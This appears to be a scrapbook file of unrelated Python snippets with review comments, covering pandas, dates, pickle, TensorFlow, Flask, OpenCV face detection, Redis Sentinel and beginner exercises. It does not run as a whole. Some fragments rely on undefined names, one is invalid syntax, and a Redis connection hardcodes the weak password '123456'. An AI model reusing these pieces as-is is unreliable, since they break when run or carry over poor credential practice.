s = '''Now that we have carried our geographical analogy quite far, we return to the uestion of isomorphisms between brains. You might well wonder why this whole uestion of brain isomorphisms has been stressed so much. What does it matter if two rains are isomorphic, or quasi-isomorphic, or not isomorphic at all? The answer is that e have an intuitive sense that, although other people differ from us in important ways, hey are still "the same" as we are in some deep and important ways. It would be nstructive to be able to pinpoint what this invariant core of human intelligence is, and hen to be able to describe the kinds of "embellishments" which can be added to it, aking each one of us a unique embodiment of this abstract and mysterious quality alled "intelligence".'''
cleaned = ' '.join([correct(w) for w in s.split()])
print(cleaned)
phrase = input("Choose your phrase:")
def translate(phrase):
    """Return phrase with every 'C' and 'c' replaced by 'b'.

    The original looped over characters but returned inside the first
    iteration, and its else-branch reset the result — so it returned the
    phrase unchanged for almost every input.
    """
    return phrase.replace("C", "b").replace("c", "b")
print(translate(phrase))
def getFactorialit(n):
    """Return n! computed iteratively; return -1 for negative n
    (the original's error sentinel).

    The original was not valid Python (`if n < 0, return -1`, mixed
    indentation, Python 2 print) — rewritten with the same intent.
    """
    if n < 0:
        return -1
    fact = 1
    for i in range(1, n + 1):
        fact *= i
    return fact

print(getFactorialit(10))
    
desired_tab = driver.current_window_handle  #storing the handle in a variable
# NOTE(review): this comparison is trivially False right after the assignment
# above — presumably other navigation happens in between; confirm placement.
if driver.current_window_handle != desired_tab:
   # switch_to_window() was deprecated and removed in Selenium 4;
   # switch_to.window() is the supported API.
   driver.switch_to.window(desired_tab)  #switching to the tab in case it's not
# Persist several trained models in one pickle, then load them back.
my_classifiers = {'logit': '<trained_logit_here>',
                  'KNN' : '<trained_KNN_here>'
                  }
# pickle.dump is the public API — pickle._dump is a private helper.
# Context managers close the file handles the original leaked.
with open(filename, 'wb') as fh:
    pickle.dump(my_classifiers, fh)

with open(filename, 'rb') as fh:
    loaded_classifiers = pickle.load(fh)
logit_model = loaded_classifiers['logit']
knn_model = loaded_classifiers['KNN']

# SECURITY: pickle.load executes arbitrary code — only unpickle trusted files.
results = logit_model.predict(X)
# TensorFlow 1.x graph-mode demo: two scalar int16 placeholders and
# add/multiply ops. NOTE(review): tf.placeholder was removed in TF 2.x
# (eager mode) — this only runs under TF1 or tf.compat.v1.
x = tf.placeholder(tf.int16, shape=(), name='ha')
y = tf.placeholder(tf.int16, shape=(), name='ho')

add = tf.add(x, y)
mul = tf.multiply(x, y)
# creates a list of numbers
numbers = ['1','2','3','4','5','6','7','8','9','0'] 

# a function that removes the string characters such as "$" or "," by using the list created above

def convertToInt(column):
    """Keep only the digit characters of `column` and parse them as an int."""
    digits = [ch for ch in column if ch in numbers]
    return int(''.join(digits))
import datetime
import dateutil.relativedelta

# One calendar month before a given date; relativedelta clamps the day
# (2013-03-31 minus one month -> 2013-02-28).
d = datetime.datetime.strptime("2013-03-31", "%Y-%m-%d")
d2 = d - dateutil.relativedelta.relativedelta(months=1)
# print is a function in Python 3 — `print d2` is a SyntaxError.
print(d2)
from pyspark.sql import SparkSession
# Get (or create) a SparkSession named 'abc' — the entry point for DataFrame APIs.
spark = SparkSession.builder.appName('abc').getOrCreate()
import datetime

def last_day_of_month(any_day):
    """Return the last date of any_day's month.

    Day 28 exists in every month, so adding 4 days is guaranteed to land
    in the following month; subtracting that date's day-of-month steps
    back to the final day of the original month.
    """
    rollover = any_day.replace(day=28) + datetime.timedelta(days=4)  # this will never fail
    return rollover - datetime.timedelta(days=rollover.day)
from datetime import datetime, timedelta

# The datetime `days_to_subtract` days before now.
# NOTE(review): days_to_subtract must be defined by earlier code/caller.
d = datetime.today() - timedelta(days=days_to_subtract)
>>> from enum import Enum
>>> class Build(Enum):
...   debug = 200
...   build = 400
... 

Build['debug']

df.set_index(KEY).to_dict()[VALUE]

3 ways:
dict(zip(df.A,df.B))
pd.Series(df.B.values,index=df.A).to_dict()
df.set_index('A').to_dict()['B']
def isfloat(value):
  """Return True if `value` parses as a float, False otherwise.

  Note: only ValueError is caught, so non-string/non-numeric types
  (e.g. None) still raise TypeError — same contract as the original.
  """
  try:
    float(value)
  except ValueError:
    return False
  return True
# Parse test.json into a Python object; `with` closes the handle the
# original left open. (Assumes `import json` earlier in the file.)
with open('test.json') as f:
    json_file = json.load(f)
import pandas as pd

# Two Series with overlapping indexes; the shorter column gets NaN at 'd'.
data_dict = {'one': pd.Series([1, 2, 3], index=['a', 'b', 'c']),
             'two': pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd'])}

df = pd.DataFrame(data_dict)

print(f"DataFrame:\n{df}\n")
print(f"column types:\n{df.dtypes}")

# Column as a plain Python list.
col_one_list = df['one'].tolist()

# Column as a NumPy array (no copy of the underlying data where possible).
col_one_arr = df['one'].to_numpy()

print(f"\ncol_one_list:\n{col_one_list}\ntype:{type(col_one_list)}")
print(f"\ncol_one_arr:\n{col_one_arr}\ntype:{type(col_one_arr)}")
# Replace whitespace-only / empty string cells with NaN via a regex.
# NOTE(review): assumes `import numpy as np` earlier in the file.
df = pd.DataFrame([
    [-0.532681, 'foo', 0],
    [1.490752, 'bar', 1],
    [-1.387326, 'foo', 2],
    [0.814772, 'baz', ' '],     
    [-0.222552, '   ', 4],
    [-1.176781,  'qux', '  '],         
], columns='A B C'.split(), index=pd.date_range('2000-01-01','2000-01-06'))

# replace field that's entirely space (or empty) with NaN
print(df.replace(r'^\s*$', np.nan, regex=True))
# NOTE(review): the block below is an exact duplicate of the one above.
df = pd.DataFrame([
    [-0.532681, 'foo', 0],
    [1.490752, 'bar', 1],
    [-1.387326, 'foo', 2],
    [0.814772, 'baz', ' '],     
    [-0.222552, '   ', 4],
    [-1.176781,  'qux', '  '],         
], columns='A B C'.split(), index=pd.date_range('2000-01-01','2000-01-06'))

# replace field that's entirely space (or empty) with NaN
print(df.replace(r'^\s*$', np.nan, regex=True))
# Select rows whose date falls in November.
nov_mask = df['Dates'].map(lambda x: x.month) == 11
df[nov_mask]

# Select rows whose month-day falls between Nov 15 and Mar 15 of any year.
nov_mar_series = pd.Series(pd.date_range("2013-11-15", "2014-03-15"))
#create timestamp without year
nov_mar_no_year = nov_mar_series.map(lambda x: x.strftime("%m-%d"))
#add a yearless timestamp to the dataframe
# NOTE(review): uses df['Date'] here but df['Dates'] above — confirm the
# actual column name.
df["no_year"] = df['Date'].map(lambda x: x.strftime("%m-%d"))
no_year_mask = df['no_year'].isin(nov_mar_no_year)
df[no_year_mask]
from redis.sentinel import Sentinel
# Connect to three password-protected Sentinel instances and ask them for
# the current master of the service named 'lerep'.
sentinel = Sentinel([
    ('192.168.77.130',26379),
    ('192.168.77.130',26380),
    ('192.168.77.130',26381),
],sentinel_kwargs={'password': '123456'}) 

sentinel.discover_master('lerep')
 # single column:
 if `A` in df and `B` in df:
 
 
 # multiple columns:
 pd.Series(['A', 'B']).isin(df.columns).all()
import re

# re.match anchors at the start of the string; 'hello1' matches hello[0-9]+.
hello_pattern = re.compile(r"hello[0-9]+")
if hello_pattern.match('hello1'):
    print('Yes')
import pandas as pd
from datetime import datetime

# Snap each datetime to the first day of its month.
ps = pd.Series([datetime(2014, 1, 7), datetime(2014, 3, 13), datetime(2014, 6, 12)])
new = ps.apply(lambda dt: dt.replace(day=1))
# NOTE(review): `all_data` is defined elsewhere; .dt.strftime turns the
# datetime column into formatted strings.
all_data['Order Day new'] = all_data['Order Day new'].dt.strftime('%Y-%m-%d')
def ffill_cols(df, cols_to_fill_name='Unn'):
    """
    Forward-fill column *names*: any column whose name starts with
    `cols_to_fill_name` inherits the name of the column to its left,
    mirroring how pandas ffill() propagates values.

    :param df: pandas DataFrame whose header row should be repaired
    :param cols_to_fill_name: str; prefix marking "unnamed" columns — pandas
    labels them 'Unnamed: N', hence the 'Unn' default

    :returns: list; the repaired column names
    """
    repaired = df.columns.to_list()
    for position, label in enumerate(repaired):
        if label.startswith(cols_to_fill_name):
            repaired[position] = repaired[position - 1]
    return repaired
>>> from operator import add
>>> list( map(add, list1, list2) )
[5, 7, 9]
# Inheritance demo: Child defines nothing, so it inherits implicit() from
# Parent. The original mixed 6- and 4-space indents inside Child's body,
# which is an IndentationError — the instance code belongs at module level.
class Parent(object):
    def implicit(self):
        print("PARENT implicit()")

class Child(Parent):
    pass

dad = Parent()
son = Child()

dad.implicit()
son.implicit()
# Split the mapping into parallel key/value lists (e.g. for plotting).
# list() over a dict and .values() preserve the same insertion order the
# original append loop relied on.
x = list(genres)
y = list(genres.values())
# Print the dict's entries ordered by ascending value
# (sorted() is stable, so equal values keep their insertion order).
for key, value in sorted(my_dict.items(), key=lambda item: item[1]):

    print('{} : {}'.format(key, value))
from csv import reader

# Read the whole CSV into a list of rows; the context manager closes the
# handle even if reading raises (the original's close() could be skipped).
with open('file_name.csv', encoding='utf-8') as fp:
    data = list(reader(fp))
>>> matches = re.findall(f'(?:{p})+', s)
>>> matches
['HELLO', 'HELLO', 'HELLOHELLOHELLO', 'HELLOHELLO']

>>> max(map(len, matches)) // len(p)
3
from setuptools import setup, find_packages

# Minimal setup.py: packages discovered automatically, and one console
# entry point mapping `command` to package_name.module_name:function_name.
setup(
  name="package-name",
  version="0.0.0",
  packages=find_packages(),
  entry_points = {
    'console_scripts':
      ["command = package_name.module_name:function_name"],
    },
)
and
or
not
!=(not equal)
==(equal)
>=(greater-than-equal)
<=(less-than-equal)
True
False
>>> format(integer, '0>42b')
'001010101111000001001000111110111111111111'
def mlm_loss(y_true, y_pred):
    """Pairwise ranking-style loss over each sample's L positions.

    The original's body was not indented under the def (a SyntaxError);
    the statements are unchanged otherwise.
    NOTE(review): relies on module-level `tf`, `batch_size` and `L` —
    confirm they are defined where this is used.
    """
    loss = float(0)
    a = tf.keras.backend.constant(1, dtype='float32')
    for s in range(batch_size): # for each sample in batch
        for i in range(L):
            for j in range(L):
                loss = loss + y_true[s][i]*(a-y_true[s][j])*(a-(y_pred[s][i]-y_pred[s][j])) #two conditions
    l = tf.keras.backend.constant(L, dtype='float32')
    loss = a/l*loss
    return loss
def add(a, b):
    """Announce the operation, then return the sum of a and b."""
    print(f"ADDING {a} + {b}")
    result = a + b
    return result


def subtract(a, b):
    """Announce the operation, then return a minus b."""
    print(f"SUBTRACTING {a} - {b}")
    result = a - b
    return result
# this is like your scripts with argv
def print_two(args):
    """Unpack a 2-item sequence and print both parts."""
    arg1, arg2 = args
    print(f"arg1:{arg1}, arg2: {arg2}")

# this just takes one argument
def print_one(arg1):
    print(f"arg1:{arg1}")

# this one takes no argument
def print_none():
    # was `print?(...)` — IPython help syntax pasted into a script,
    # which is a SyntaxError in plain Python.
    print("I got nothin',")
from sys import argv
# Unpack the CLI arguments: script name plus exactly two parameters.
# NOTE(review): raises ValueError unless exactly two args are passed.
script, first, second = argv

print("The script is called:", script)
print("The first variable is:", first)
print("The second variable is:", second)
from sys import argv

# Print a file named on the command line, then prompt for another file name
# and print that one too.
script, filename = argv  # was `filenames` while the code below read `filename`

txt = open(filename)

print(f"Here's your life (unknown):")
print(txt.read())

print("Type the filename again:")
file_open = input(">")

txt_again = open(file_open)  # was the undefined name `file_again`
print(txt_again.read())
# Prompt for three answers on the same line as each question (end=' '
# suppresses the newline), then echo them in a summary sentence.
print("How old are you?", end=' ')
age = input()
print("How tall are you?", end= ' ')
height = input()
print("How much do you weight?", end= ' ')
weight = input()

print(f"So, you're {age} old, {height} tall and {weight} heavy.")
from sys import argv
# The original line was a bare no-op tuple expression — `= argv` was missing.
script, first, second = argv

print("The script is called:", script)
print("your first variable is:", first)
print("your second variable is:", second)  # closing quote was missing
# str.format demo: the same 4-slot template applied to different value types.
formatter = "{} {} {} {}"

print(formatter.format(1, 2, 3, 4))
# The originals referenced undefined names (`one`, lowercase `true`) and
# raised NameError — placeholders accept any object, so pass literals.
print(formatter.format("one", "two", "three", "four"))
print(formatter.format(True, False, False, True))
# String concatenation with +.
end1 = "B"
end2 = "u"
end3 = "r"
end4 = "g"
end5 = "e"
end6 = "r"

# NOTE(review): end6 is deliberately left out, so this prints "Burge" —
# the exercise's point; add `+ end6` for the full word.
print(end1 + end2 + end3 + end4 + end5)
A) Detect faces in Image file (using Python & OpenCV)



face_detect.py :
=================

import cv2

# Haar-cascade face detector; the XML file must sit next to the script.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

# Cascades operate on grayscale images.
img = cv2.imread('face.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)


# Returns an array of (x, y, w, h) boxes, one per detected face.
faces = face_cascade.detectMultiScale(
    gray,
    scaleFactor=1.1,
    minNeighbors=5,
    minSize=(30, 30),
    flags = cv2.CASCADE_SCALE_IMAGE
)

print("Faces shape : ", faces.shape)

# Draw a blue (BGR 255,0,0) rectangle around each detection.
for (x,y,w,h) in faces:
    cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)

print("Face count : ", faces.shape[0])

# Show the annotated image until any key is pressed.
cv2.imshow('img',img)
cv2.waitKey(0)
cv2.destroyAllWindows()


=====================================================================

B) Detect faces using Camera (using Python & OpenCV).


face_detect_cam.py :
====================
import cv2

# Same Haar cascade as the image version, applied to live camera frames.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

# Device 0 is the default camera.
cap = cv2.VideoCapture(0)

while True:
	ret, img = cap.read();
	
	# ret is False when no frame could be grabbed (camera unplugged, EOF).
	if not ret:
		break
		
	gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

	faces = face_cascade.detectMultiScale(
		gray,
		scaleFactor=1.1,
		minNeighbors=5,
		minSize=(30, 30),
		flags = cv2.CASCADE_SCALE_IMAGE
	)

	# Blue box per detected face.
	for (x,y,w,h) in faces:
		cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
	
	cv2.imshow('Face', img)
	
	# Exit on ESC (27) or 'q'.
	key = cv2.waitKey(1)
	if key==27 or key==ord('q'):
		break;

cap.release()
cv2.destroyAllWindows()


# f-string interpolation demo.
types_of_people = 10
x = f"there are {types_of_people} types of people."

binary = "binary"
do_not = "don't"  # the bare don't was a SyntaxError — the apostrophe needs quoting
y = f"those who know {binary} and those who {do_not}."
cars = 80
drivers = 40
passengers = 70

# Python's print is lowercase — `Print(cars)` raised NameError.
print(cars)
# print this line
print("Hello world again")
In [1]: data = [
   ...:     {'id': '10', 'animal' : 'cat'},
   ...:     {'id': '11', 'animal' : 'dog'},
   ...:     {'id': '3', 'animal' : 'pigeon'},
   ...:     {'id': '10', 'color' : 'yellow'},
   ...:     {'id': '11', 'color' : 'brown'},
   ...:     {'id': '3', 'color' : 'grey'},
   ...:     {'id': '10', 'type' : 'furry'},
   ...:     {'id': '11', 'type' : 'fluffy'},
   ...:     {'id': '3', 'type' : 'dirty'},
   ...: ]

In [2]: from collections import defaultdict
   ...: ids = defaultdict(dict)
   ...: for d in data:
   ...:     ids[d["id"]].update(d)
   ...:


In [6]: list(ids.values())
Out[6]:
[{'id': '10', 'animal': 'cat', 'color': 'yellow', 'type': 'furry'},
 {'id': '11', 'animal': 'dog', 'color': 'brown', 'type': 'fluffy'},
 {'id': '3', 'animal': 'pigeon', 'color': 'grey', 'type': 'dirty'}]
# Overwrite every object-dtype (string) column of df with the scalar 0:
# fromkeys builds {col_name: 0, ...} and assign(**d) applies it per column.
d = dict.fromkeys(df.select_dtypes(object).columns, 0)
df = df.assign(**d)
# Django model: field1 is required (no blanks, no NULL), field2 is optional.
class MyModel(models.Model):
        field1 = models.CharField(max_length=40, blank=False, null=False)
        field2 = models.CharField(max_length=60, blank=True, null=True)
# Open a file and read its entire contents in one call; the context manager
# closes the handle even if read() raises (the original's close() could be
# skipped on error).
with open('my_text_file', mode='r') as file:
    # read all lines at once
    all_of_it = file.read()
import ast

# Safely parse a Python list literal from a string, then trim the
# stray whitespace around each element in a single pass.
l = [item.strip() for item in ast.literal_eval('[ "A","B","C" , " D"]')]
from datetime import datetime, timedelta

# The datetime `days_to_subtract` days before now.
# NOTE(review): duplicate of an earlier snippet; days_to_subtract must be
# defined by earlier code/caller.
d = datetime.today() - timedelta(days=days_to_subtract)
def toDate(dateString): 
    """Parse 'YYYY-MM-DD' into a date — used as a Flask query-param converter.

    NOTE(review): expects `import datetime` (the module); a preceding snippet
    imports the *class* `datetime`, under which datetime.datetime would fail.
    """
    return datetime.datetime.strptime(dateString, "%Y-%m-%d").date()

# A route needs its URL rule — a bare @app.route() raises TypeError at import.
@app.route('/event')
def event():
    # Fall back to today's date when no ?start=YYYY-MM-DD parameter is given.
    ektempo = request.args.get('start', default = datetime.date.today(), type = toDate)
    ...
from datetime import date
from dateutil.rrule import rrule, DAILY

a = date(2009, 5, 30)
b = date(2009, 6, 9)

# Iterate every day from a to b inclusive.
for dt in rrule(DAILY, dtstart=a, until=b):
    # print is a function in Python 3 — the original py2 statement was a SyntaxError.
    print(dt.strftime("%Y-%m-%d"))
# Depth-first search for every path (sequence of dict keys / list indexes)
# leading to a given key inside an arbitrarily nested dict/list structure.
# result and path should be outside of the scope of find_path to persist values during recursive calls to the function
result = []
path = []
from copy import copy

# i is the index of the list that dict_obj is part of
def find_path(dict_obj,key,i=None):
    # Mutates the module-level `path` as it descends and appends a snapshot
    # to `result` each time `key` is found. NOTE(review): because state is
    # global, calling this twice accumulates into the same `result`.
    for k,v in dict_obj.items():
        # add key to path
        path.append(k)
        if isinstance(v,dict):
            # continue searching
            find_path(v, key,i)
        if isinstance(v,list):
            # search through list of dictionaries
            for i,item in enumerate(v):
                # add the index of list that item dict is part of, to path
                path.append(i)
                if isinstance(item,dict):
                    # continue searching in item dict
                    find_path(item, key,i)
                # if reached here, the last added index was incorrect, so removed
                path.pop()
        if k == key:
            # add path to our result
            result.append(copy(path))
        # remove the key added in the first line
        if path != []:
            path.pop()

# default starting index is set to None
# NOTE(review): `di` (the structure to search) is defined elsewhere.
find_path(di,"location")
print(result)
# [['queryResult', 'outputContexts', 4, 'parameters', 'DELIVERY_ADDRESS_VALUE', 'location'], ['originalDetectIntentRequest', 'payload', 'inputs', 0, 'arguments', 0, 'extension', 'location']]
>>> from sklearn.metrics import f1_score
>>> y_true = [0, 1, 2, 0, 1, 2]
>>> y_pred = [0, 2, 1, 0, 0, 1]
>>> f1_score(y_true, y_pred, average='macro')
0.26...
>>> f1_score(y_true, y_pred, average='micro')
0.33...
>>> f1_score(y_true, y_pred, average='weighted')
0.26...
>>> f1_score(y_true, y_pred, average=None)
array([0.8, 0. , 0. ])
>>> y_true = [0, 0, 0, 0, 0, 0]
>>> y_pred = [0, 0, 0, 0, 0, 0]
>>> f1_score(y_true, y_pred, zero_division=1)
1.0...